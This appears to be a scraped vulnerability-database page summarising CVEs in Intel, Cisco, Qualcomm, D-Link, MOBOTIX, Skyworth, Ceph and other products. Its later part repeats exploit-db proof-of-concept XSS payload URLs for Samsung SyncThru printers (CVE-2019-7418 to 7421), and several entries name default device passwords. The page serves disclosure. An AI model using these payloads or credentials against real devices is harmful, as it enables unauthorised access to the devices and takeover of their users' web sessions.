VARIoT IoT vulnerabilities database

Insufficient file protection in uninstall routine for Intel(R) Data Center Manager SDK before version 5.0.2 may allow an authenticated user to potentially enable information disclosure via local access. This product mainly provides real-time power supply and heat dissipation data of equipment

Insufficient file protection in install routine for Intel(R) Data Center Manager SDK before version 5.0.2 may allow an authenticated user to potentially enable information disclosure via local access. This product mainly provides real-time power supply and heat dissipation data of equipment

Insufficient session authentication in web server for Intel(R) Data Center Manager SDK before version 5.0.2 may allow an unauthenticated user to potentially enable escalation of privilege via network access. Intel(R) Data Center Manager SDK Contains a session fixation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Intel Data Center Manager SDK is prone to multiple privilege-escalation vulnerabilities. An attackers may exploit this issue to gain elevated privileges. Intel Data Center Manager SDK version prior 5.0.2 are vulnerable. This product mainly provides real-time power supply and heat dissipation data of equipment

Authentication bypass in the Intel Unite(R) solution versions 3.2 through 3.3 may allow an unauthenticated user to potentially enable escalation of privilege to the Intel Unite(R) Solution administrative portal via network access. Intel(R) Unite Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Intel Unite App is prone to a privilege-escalation vulnerability. A remote attacker can exploit this issue to gain elevated privileges. Intel Unite App 3.2 through 3.3. are vulnerable. Intel Unite is an enterprise conference collaboration solution developed by Intel Corporation of the United States. A security vulnerability exists in the management portal in Intel Unite(R) versions 3.2 to 3.3

Logic error in the installer for Intel(R) OpenVINO(TM) 2018 R3 and before for Linux may allow a privileged user to potentially enable information disclosure via local access. Intel(R) OpenVINO(TM) Contains an information disclosure vulnerability.Information may be obtained. Intel OpenVINO is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information. This may aid in further attacks. OpenVINO 2018 for Linux prior to versions R4 are vulnerable. Intel OpenVINO for Linux is an open visual reasoning and neural network optimization toolkit based on the Linux platform of Intel Corporation. There is a security vulnerability in the installation program of Intel(R) OpenVINO(TM) 2018 R3 and earlier versions based on the Linux platform. The vulnerability is caused by a logic error in the program

A vulnerability in the management web interface of Cisco Network Assurance Engine (NAE) could allow an unauthenticated, local attacker to gain unauthorized access or cause a Denial of Service (DoS) condition on the server. The vulnerability is due to a fault in the password management system of NAE. An attacker could exploit this vulnerability by authenticating with the default administrator password via the CLI of an affected server. A successful exploit could allow the attacker to view potentially sensitive information or bring the server down, causing a DoS condition. This vulnerability affects Cisco Network Assurance Engine (NAE) Release 3.0(1). The default password condition only affects new installations of Release 3.0(1). An attackers with knowledge of the default credentials may exploit this vulnerability to gain unauthorized access and perform unauthorized actions. This may aid in further attacks. This issue is tracked by Cisco Bug ID CSCvo18229. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements

Certain Lexmark CX, MX, X, XC, XM, XS, and 6500e devices before 2019-02-11 allow remote attackers to erase stored shortcuts. plural Lexmark The device contains an input validation vulnerability.Information may be tampered with. A security vulnerability exists in several Lexmark products. A remote attacker could exploit this vulnerability to perform delete operations. The following products and versions are affected: Lexmark CX prior to 2019-02-11; MX prior to 2019-02-11; X prior to 2019-02-11; XC prior to 2019-02-11; XM prior to 2019-02-11 Previous version; XS version before 2019-02-11; 6500e version before 2019-02-11

While processing radio connection status change events, Radio index is not properly validated in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile and Snapdragon Voice & Music in versions MDM9206, MDM9607, MDM9640, MDM9650, MSM8996AU, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 625, SD 636, SD 650/52, SD 675, SD 712 / SD 710 / SD 670, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM439, SDM630, SDM660, SDX20, SDX24. plural Snapdragon The product contains a vulnerability related to array index validation.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Qualcomm MDM9206 and others are products of Qualcomm (Qualcomm). MDM9206 is a central processing unit (CPU) product. MDM9607 is a central processing unit (CPU) product. MDM9640 is a central processing unit (CPU) product. An input validation error vulnerability exists in several Qualcomm products. The vulnerability stems from the failure of the network system or product to properly validate the input data

D-Link DIR-600M C1 3.04 devices allow authentication bypass via a direct request to the wan.htm page. NOTE: this may overlap CVE-2019-13101. D-Link DIR-600M The device contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The D-LinkDIR-600MC1 is a wireless router from (D-Link). A security vulnerability exists in the D-LinkDIR-600MC version 13.04. This vulnerability stems from the lack of authentication measures or insufficient authentication strength in network systems or products

An issue was discovered on Shenzhen Coship WM3300 WiFi Router 5.0.0.55 devices. The password reset functionality of the Wireless SSID doesn't require any type of authentication. By making a POST request to the regx/wireless/wl_security_2G.asp URI, the attacker can change the password of the Wi-FI network. Shenzhen Coship WM3300 WiFi Router devices contain vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Coship Wireless Router is a wireless router produced by China Coship Electronics (Coship). There are security vulnerabilities in Coship Wireless Router versions 4.0.0.x and 5.0.0.x. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements

An issue was discovered on Shenzhen Skyworth DT741 Converged Intelligent Terminal (G/EPON+IPTV) SDOTBGN1, DT721-cb SDOTBGN1, and DT741-cb SDOTBGN1 devices. A long password to the Web_passwd function allows remote attackers to cause a denial of service (segmentation fault) or achieve unauthenticated remote code execution because of control of registers S0 through S4 and T4 through T7. Skyworth DT741 , DT721-cb , DT741-cb The device contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. There is an input validation error vulnerability in Skyworth GPON HomeGateways and Optical Network terminals. The vulnerability originates from incorrect verification of data boundaries when network systems or products perform operations on memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc. The following products and versions are affected: DT741 Converged Intelligent Terminal (G/EPON+IPTV); DT741 Converged Intelligent Terminal (G/EPON+IPTV); DT721-cb GPON uplink home gateway (GPON+2FE+1POTS); DT721-cb GPON Uplink Home Gateway (GPON+2FE+1POTS); DT741-cb GPON uplink home gateway (GPON+4FE+1POTS+WIFI+USB); DT741-cb GPON Uplink Home Gateway (GPON+4FE+1POTS+WIFI+USB); DT741 -cbGPON uplink home gateway DT741-cb

A flaw was found in the way civetweb frontend was handling requests for ceph RGW server with SSL enabled. An unauthenticated attacker could create multiple connections to ceph RADOS gateway to exhaust file descriptors for ceph-radosgw service resulting in a remote denial of service. civetWeb Contains a resource management vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. RedHat Ceph is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause denial-of-service conditions. ========================================================================== Ubuntu Security Notice USN-4035-1 June 25, 2019 ceph vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 19.04 - Ubuntu 18.10 - Ubuntu 16.04 LTS Summary: Several security issues were fixed in Ceph. Software Description: - ceph: distributed storage and file system Details: It was discovered that Ceph incorrectly handled read only permissions. An authenticated attacker could use this issue to obtain dm-crypt encryption keys. This issue only affected Ubuntu 16.04 LTS. (CVE-2018-14662) It was discovered that Ceph incorrectly handled certain OMAPs holding bucket indices. This issue only affected Ubuntu 16.04 LTS. (CVE-2018-16846) It was discovered that Ceph incorrectly sanitized certain debug logs. A local attacker could possibly use this issue to obtain encryption key information. This issue was only addressed in Ubuntu 18.10 and Ubuntu 19.04. (CVE-2018-16889) It was discovered that Ceph incorrectly handled certain civetweb requests. This issue only affected Ubuntu 18.10 and Ubuntu 19.04. (CVE-2019-3821) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 19.04: ceph 13.2.4+dfsg1-0ubuntu2.1 ceph-common 13.2.4+dfsg1-0ubuntu2.1 Ubuntu 18.10: ceph 13.2.4+dfsg1-0ubuntu0.18.10.2 ceph-common 13.2.4+dfsg1-0ubuntu0.18.10.2 Ubuntu 16.04 LTS: ceph 10.2.11-0ubuntu0.16.04.2 ceph-common 10.2.11-0ubuntu0.16.04.2 In general, a standard system update will make all the necessary changes. References: https://usn.ubuntu.com/4035-1 CVE-2018-14662, CVE-2018-16846, CVE-2018-16889, CVE-2019-3821 Package Information: https://launchpad.net/ubuntu/+source/ceph/13.2.4+dfsg1-0ubuntu2.1 https://launchpad.net/ubuntu/+source/ceph/13.2.4+dfsg1-0ubuntu0.18.10.2 https://launchpad.net/ubuntu/+source/ceph/10.2.11-0ubuntu0.16.04.2

An issue was discovered on MOBOTIX S14 MX-V4.2.1.61 devices. /admin/access accepts a request to set the "aaaaa" password, considered insecure for some use cases, from a user. MOBOTIX S14 The device contains a certificate / password management vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. MOBOTIX S14 is a network camera produced by German MOBOTIX company. There is a security vulnerability in MOBOTIX S14 MX-V4.2.1.61 version. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements

An issue was discovered on MOBOTIX S14 MX-V4.2.1.61 devices. The default management application is delivered over cleartext HTTP with Basic Authentication, as demonstrated by the /admin/index.html URI. MOBOTIX S14 The device contains an authentication vulnerability.Information may be obtained. MOBOTIX S14 is a network camera produced by German MOBOTIX company. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements

An issue was discovered on MOBOTIX S14 MX-V4.2.1.61 devices. Administrator Credentials are stored in the 13-character DES hash format. MOBOTIX S14 The device contains an information disclosure vulnerability.Information may be obtained. MOBOTIX S14 is a network camera produced by German MOBOTIX company. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements

A weak password vulnerability was discovered in Enphase Envoy R3.*.*. One can login via TCP port 8888 with the admin password for the admin account. Enphase Envoy Contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Enphase Envoy is the core home energy control gateway in Enphase Energy's home energy solution. Allows remote attackers to use vulnerabilities to submit special requests and unauthorized access to applications

An issue was discovered on MOBOTIX S14 MX-V4.2.1.61 devices. There is a default password of meinsm for the admin account. MOBOTIX S14 The device contains a vulnerability related to the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. MOBOTIX S14 is a network camera produced by German MOBOTIX company. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements

SAMSUNG X7400GX SyncThru Web Service Contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. The vulnerability stems from the lack of correct verification of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7418 # Category: webapps 1. Description XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws/swsAlert.sws" in multiple parameters: flag, frame, func, and Nfunc. 2. Proof of Concept URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &msg=The%20requested%20report(s)%20will%20be%20printed Parameter frame=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter flag=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter Nfunc=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter func=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter type=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter popupid=<SCRIPT>alert("XSS");</SCRIPT> 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7419 # Category: webapps 1. 2. Proof of Concept URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=Maintenance&ruiFw_title=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E Parameter ruiFw_title=<SCRIPT>alert(XSS);</SCRIPT> URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_title=Mantenimiento Parameter ruiFw_pid=<SCRIPT>alert(XSS);</SCRIPT> URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_pid=Maintenance&ruiFw_title=Mantenimiento Parameter ruiFw_id=<SCRIPT>alert(XSS);</SCRIPT> 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7420 # Category: webapps 1. Proof of Concept URL http://X.X.X.X/sws.application/information/networkinformationView.sws?tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E Parameter tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7421 # Category: webapps 1. 2. Proof of Concept URL http://X.X.X.X/sws.login/gnb/loginView.sws?contextpath=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org Parameter contextpath=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws.login/gnb/loginView.sws?basedURL=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&popupid=id_Login Parameter basedURL=<SCRIPT>alert(XSS);</SCRIPT> 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules -->

XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws.application/information/networkinformationView.sws" in the tabName parameter. The vulnerability stems from the lack of correct verification of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7418 # Category: webapps 1. 2. Proof of Concept URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &msg=The%20requested%20report(s)%20will%20be%20printed Parameter frame=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter flag=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter Nfunc=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter func=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter type=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter popupid=<SCRIPT>alert("XSS");</SCRIPT> 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7419 # Category: webapps 1. 2. Proof of Concept URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=Maintenance&ruiFw_title=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E Parameter ruiFw_title=<SCRIPT>alert(XSS);</SCRIPT> URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_title=Mantenimiento Parameter ruiFw_pid=<SCRIPT>alert(XSS);</SCRIPT> URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_pid=Maintenance&ruiFw_title=Mantenimiento Parameter ruiFw_id=<SCRIPT>alert(XSS);</SCRIPT> 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7420 # Category: webapps 1. Proof of Concept URL http://X.X.X.X/sws.application/information/networkinformationView.sws?tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E Parameter tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7421 # Category: webapps 1. 2. Proof of Concept URL http://X.X.X.X/sws.login/gnb/loginView.sws?contextpath=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org Parameter contextpath=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws.login/gnb/loginView.sws?basedURL=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&popupid=id_Login Parameter basedURL=<SCRIPT>alert(XSS);</SCRIPT> 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules -->

SAMSUNG X7400GX SyncThru Web Service Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The vulnerability stems from the lack of correct verification of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7418 # Category: webapps 1. Description XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws/swsAlert.sws" in multiple parameters: flag, frame, func, and Nfunc. 2. Proof of Concept URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &msg=The%20requested%20report(s)%20will%20be%20printed Parameter frame=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter flag=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter Nfunc=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter func=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter type=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter popupid=<SCRIPT>alert("XSS");</SCRIPT> 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7419 # Category: webapps 1. 2. Proof of Concept URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=Maintenance&ruiFw_title=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E Parameter ruiFw_title=<SCRIPT>alert(XSS);</SCRIPT> URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_title=Mantenimiento Parameter ruiFw_pid=<SCRIPT>alert(XSS);</SCRIPT> URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_pid=Maintenance&ruiFw_title=Mantenimiento Parameter ruiFw_id=<SCRIPT>alert(XSS);</SCRIPT> 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web 